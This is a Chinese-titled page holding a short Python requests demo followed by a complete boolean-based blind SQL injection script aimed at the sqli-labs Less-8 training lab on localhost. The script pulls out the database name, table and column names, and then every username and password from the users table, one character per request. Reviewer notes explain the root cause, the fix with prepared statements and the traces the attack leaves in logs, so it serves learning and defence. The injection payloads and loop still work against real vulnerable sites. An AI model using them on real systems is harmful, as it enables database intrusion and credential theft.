基于布尔的盲注入 Python 脚本
# coding: utf-8
# Smallest possible `requests` round trip: one GET, then four views of the
# result. No timeout is passed, so the call waits as long as the server takes.
import requests

url = 'http://www.baidu.com'
ret = requests.get(url)

# The Response object itself: its class (<class 'requests.models.Response'>)
# and its repr (<Response [200]> when the request succeeded).
print(type(ret))
print(ret)

# The body, first decoded to text, then as raw bytes.
print(ret.text)
print(ret.content)
# coding:utf-8
"""Boolean-based blind SQL injection walkthrough for the sqli-labs Less-8 lab.

Every request goes to the lab instance on 127.0.0.1. The page never echoes
query results; the only signal is whether the response body contains the
text 'You are in'. Each function appends a condition to the ``id`` parameter
and reads that one bit back, one guess per request.

Reviewer notes (defensive reading of the exercise):

* Root cause is server-side: the ``id`` value evidently reaches the SQL
  statement as text. The lab's PHP is not shown on this page; binding ``id``
  as a parameter of a prepared statement removes the true/false oracle.
* The traffic is easy to recognise. One recovered character costs up to
  ``len(alphabet)`` GETs, so ``username_value`` alone can send 99 * 39
  requests to the same path, differing by a single character and carrying
  ``substr(``, ``group_concat(`` or ``information_schema`` in the query
  string. That burst is what access logs and WAF rules should key on.
* A character that is not in a function's alphabet is skipped without any
  marker, so the printed result can be shorter than the real value.
"""
import requests


def _page_says_true(url):
    """Send one probe and report whether the page shows its success text.

    '%23' is the URL-encoded '#'; it is appended to every probe, presumably
    to comment out whatever follows ``id`` in the server's statement.
    """
    reply = requests.get(url + '%23')
    return 'You are in' in reply.text


# Get the length of the database name.
def database_len():
    """Print the database-name length by asking ``length(database()) > n``.

    Guesses run from 1 to 9. Each guess that still answers true is printed;
    the first false answer is reported as the length. If all nine guesses
    answer true, nothing is reported.
    """
    base = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
    for guess in range(1, 10):
        condition = '''?id=1' and length(database())>%s''' % guess
        if not _page_says_true(base + condition):
            print('database_length:', guess)
            break
        print(guess)


database_len()


# Get the database name.
def database_name():
    """Print the database name, recovered one character at a time.

    Positions 1 to 8 are tried against digits and both letter cases; the
    growing prefix is printed after every hit.
    """
    recovered = ''
    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    template = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'"
    for position in range(1, 9):
        for candidate in alphabet:
            if not _page_says_true(template % (position, candidate)):
                continue
            recovered += candidate
            print(recovered)
            break
    print('database_name:', recovered)


database_name()


# Get the tables of the database.
def tables_name():
    """Print the comma-joined table names of the current schema.

    Reads ``group_concat(table_name)`` from ``information_schema.tables``,
    positions 1 to 29, lowercase letters and ',' only.
    """
    recovered = ''
    alphabet = 'abcdefghijklmnopqrstuvwxyz,'
    template = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'"
    for position in range(1, 30):
        for candidate in alphabet:
            if not _page_says_true(template % (position, candidate)):
                continue
            recovered += candidate
            print(recovered)
            break
    print('table_name:', recovered)


tables_name()


# Get the columns of the table.
def columns_name():
    """Print the comma-joined column names of the ``users`` table.

    Reads ``group_concat(column_name)`` from ``information_schema.columns``,
    positions 1 to 29, lowercase letters and ',' only.
    """
    recovered = ''
    alphabet = 'abcdefghijklmnopqrstuvwxyz,'
    template = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'"
    for position in range(1, 30):
        for candidate in alphabet:
            if not _page_says_true(template % (position, candidate)):
                continue
            recovered += candidate
            print(recovered)
            break
    print('column_name:', recovered)


columns_name()


# Get the username values.
def username_value():
    """Print the comma-joined ``username`` values of ``users``.

    Positions 1 to 99; digits, lowercase letters and ',', '_', '-'.
    """
    recovered = ''
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz,_-'
    template = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'"
    for position in range(1, 100):
        for candidate in alphabet:
            if not _page_says_true(template % (position, candidate)):
                continue
            recovered += candidate
            print(recovered)
            break
    print('username_value:', recovered)


username_value()


# Get the password values.
def password_value():
    """Print the comma-joined ``password`` values of ``users``.

    Positions 1 to 99; digits, lowercase letters and ',', '_', '-'.
    """
    # NOTE(review): whatever comes back is the stored form of the column;
    # the page does not show whether the lab hashes it.
    recovered = ''
    alphabet = '0123456789abcdefghijklmnopqrstuvwxyz,_-'
    template = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'"
    for position in range(1, 100):
        for candidate in alphabet:
            if not _page_says_true(template % (position, candidate)):
                continue
            recovered += candidate
            print(recovered)
            break
    print('password_value:', recovered)


password_value()